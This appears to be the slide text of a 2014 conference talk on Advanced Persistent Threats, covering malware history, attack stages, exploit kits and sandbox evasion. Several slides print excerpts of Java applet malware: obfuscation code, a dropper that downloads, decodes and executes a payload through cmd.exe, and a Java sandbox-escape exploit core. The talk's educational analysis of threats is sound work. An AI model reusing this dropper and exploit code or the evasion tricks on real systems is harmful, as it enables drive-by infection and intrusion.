SlideShare une entreprise Scribd logo

The magic world of APT 0.6 - Pompili

Codemotion
Codemotion

Slides from Simone Pompili talk @Codemotion Roma 2014

TechnologieBusiness
1  sur  51
Télécharger pour lire hors ligne
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware più complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero è il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica…
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian

Recommandé

The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For MoneyShubham Gupta
 
Digital citizenship for Students
Digital citizenship for StudentsDigital citizenship for Students
Digital citizenship for StudentsKelgator
 
工数把握のすすめ 〜WorkTimeプラグインの使い方〜
工数把握のすすめ 〜WorkTimeプラグインの使い方〜工数把握のすすめ 〜WorkTimeプラグインの使い方〜
工数把握のすすめ 〜WorkTimeプラグインの使い方〜Tomohisa Kusukawa
 
Spring fest2020 spring-security
Spring fest2020 spring-securitySpring fest2020 spring-security
Spring fest2020 spring-security土岐 孝平
 
The Secret Of Hacking Trial Pages
The Secret Of Hacking Trial PagesThe Secret Of Hacking Trial Pages
The Secret Of Hacking Trial Pagesleoimpact
 
The most well known closed vulnerabilities
The most well known closed vulnerabilitiesThe most well known closed vulnerabilities
The most well known closed vulnerabilitiesRiyadh Khan
 
Software Piracy
Software PiracySoftware Piracy
Software PiracyByerdavi
 

Recommandé

The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For MoneyShubham Gupta
 
Digital citizenship for Students
Digital citizenship for StudentsDigital citizenship for Students
Digital citizenship for StudentsKelgator
 
工数把握のすすめ 〜WorkTimeプラグインの使い方〜
工数把握のすすめ 〜WorkTimeプラグインの使い方〜工数把握のすすめ 〜WorkTimeプラグインの使い方〜
工数把握のすすめ 〜WorkTimeプラグインの使い方〜Tomohisa Kusukawa
 
Spring fest2020 spring-security
Spring fest2020 spring-securitySpring fest2020 spring-security
Spring fest2020 spring-security土岐 孝平
 
The Secret Of Hacking Trial Pages
The Secret Of Hacking Trial PagesThe Secret Of Hacking Trial Pages
The Secret Of Hacking Trial Pagesleoimpact
 
The most well known closed vulnerabilities
The most well known closed vulnerabilitiesThe most well known closed vulnerabilities
The most well known closed vulnerabilitiesRiyadh Khan
 
Software Piracy
Software PiracySoftware Piracy
Software PiracyByerdavi
 
Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The WebMichael Coates
 
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編VirtualTech Japan Inc.
 
Bug Bounty Basics
Bug Bounty BasicsBug Bounty Basics
Bug Bounty BasicsHackerOne
 
ON THE TRIP流 UX的負債の避け方、負い方、返し方
ON THE TRIP流 UX的負債の避け方、負い方、返し方ON THE TRIP流 UX的負債の避け方、負い方、返し方
ON THE TRIP流 UX的負債の避け方、負い方、返し方loftwork
 
Mob Programming ってなんですか?
Mob Programming ってなんですか?Mob Programming ってなんですか?
Mob Programming ってなんですか?Toshiyuki Ando
 
go + swaggerでAPIサーバーを作ってみる
go + swaggerでAPIサーバーを作ってみるgo + swaggerでAPIサーバーを作ってみる
go + swaggerでAPIサーバーを作ってみる虎の穴 開発室
 
Software Piracy Powerpoint
Software Piracy PowerpointSoftware Piracy Powerpoint
Software Piracy PowerpointMbradber
 
Pythonで二段階認証
Pythonで二段階認証Pythonで二段階認証
Pythonで二段階認証aoshiman
 
Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesDaveEdwards12
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresMarco Morana
 
Eclipseデバッガを活用するための31のtips
Eclipseデバッガを活用するための31のtipsEclipseデバッガを活用するための31のtips
Eclipseデバッガを活用するための31のtipsHiroki Kondo
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Malware and security
Malware and securityMalware and security
Malware and securityGurbakash Phonsa
 
Cybercrimes (Against Children)
Cybercrimes (Against Children)Cybercrimes (Against Children)
Cybercrimes (Against Children)Can R. PAHALI
 
Bug Bounty Secrets
Bug Bounty Secrets Bug Bounty Secrets
Bug Bounty Secrets n|u - The Open Security Community
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - BeginnersHimanshu Kumar Das
 
Ransomware: Wannacry
Ransomware: WannacryRansomware: Wannacry
Ransomware: WannacryMikel Solabarrieta
 
Scc2014 :jQueryの仕組みを完璧に理解する
Scc2014 :jQueryの仕組みを完璧に理解するScc2014 :jQueryの仕組みを完璧に理解する
Scc2014 :jQueryの仕組みを完璧に理解するJun Futakawa
 
Digital Security for Journalists
Digital Security for JournalistsDigital Security for Journalists
Digital Security for JournalistsLaurent Eschenauer
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 

Contenu connexe

Tendances

Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The WebMichael Coates
 
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編VirtualTech Japan Inc.
 
Bug Bounty Basics
Bug Bounty BasicsBug Bounty Basics
Bug Bounty BasicsHackerOne
 
ON THE TRIP流 UX的負債の避け方、負い方、返し方
ON THE TRIP流 UX的負債の避け方、負い方、返し方ON THE TRIP流 UX的負債の避け方、負い方、返し方
ON THE TRIP流 UX的負債の避け方、負い方、返し方loftwork
 
Mob Programming ってなんですか?
Mob Programming ってなんですか?Mob Programming ってなんですか?
Mob Programming ってなんですか?Toshiyuki Ando
 
go + swaggerでAPIサーバーを作ってみる
go + swaggerでAPIサーバーを作ってみるgo + swaggerでAPIサーバーを作ってみる
go + swaggerでAPIサーバーを作ってみる虎の穴 開発室
 
Software Piracy Powerpoint
Software Piracy PowerpointSoftware Piracy Powerpoint
Software Piracy PowerpointMbradber
 
Pythonで二段階認証
Pythonで二段階認証Pythonで二段階認証
Pythonで二段階認証aoshiman
 
Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesDaveEdwards12
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresMarco Morana
 
Eclipseデバッガを活用するための31のtips
Eclipseデバッガを活用するための31のtipsEclipseデバッガを活用するための31のtips
Eclipseデバッガを活用するための31のtipsHiroki Kondo
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Cybercrimes (Against Children)
Cybercrimes (Against Children)Cybercrimes (Against Children)
Cybercrimes (Against Children)Can R. PAHALI
 
Scc2014 :jQueryの仕組みを完璧に理解する
Scc2014 :jQueryの仕組みを完璧に理解するScc2014 :jQueryの仕組みを完璧に理解する
Scc2014 :jQueryの仕組みを完璧に理解するJun Futakawa
 
Digital Security for Journalists
Digital Security for JournalistsDigital Security for Journalists
Digital Security for JournalistsLaurent Eschenauer
 

Tendances (20)

Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The Web
 
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
OpenStackで始めるクラウド環境構築入門 Havana&DevStack編
 
Bug Bounty Basics
Bug Bounty BasicsBug Bounty Basics
Bug Bounty Basics
 
ON THE TRIP流 UX的負債の避け方、負い方、返し方
ON THE TRIP流 UX的負債の避け方、負い方、返し方ON THE TRIP流 UX的負債の避け方、負い方、返し方
ON THE TRIP流 UX的負債の避け方、負い方、返し方
 
Mob Programming ってなんですか?
Mob Programming ってなんですか?Mob Programming ってなんですか?
Mob Programming ってなんですか?
 
go + swaggerでAPIサーバーを作ってみる
go + swaggerでAPIサーバーを作ってみるgo + swaggerでAPIサーバーを作ってみる
go + swaggerでAPIサーバーを作ってみる
 
Software Piracy Powerpoint
Software Piracy PowerpointSoftware Piracy Powerpoint
Software Piracy Powerpoint
 
Pythonで二段階認証
Pythonで二段階認証Pythonで二段階認証
Pythonで二段階認証
 
Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilities
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Encoded Attacks And Countermeasures
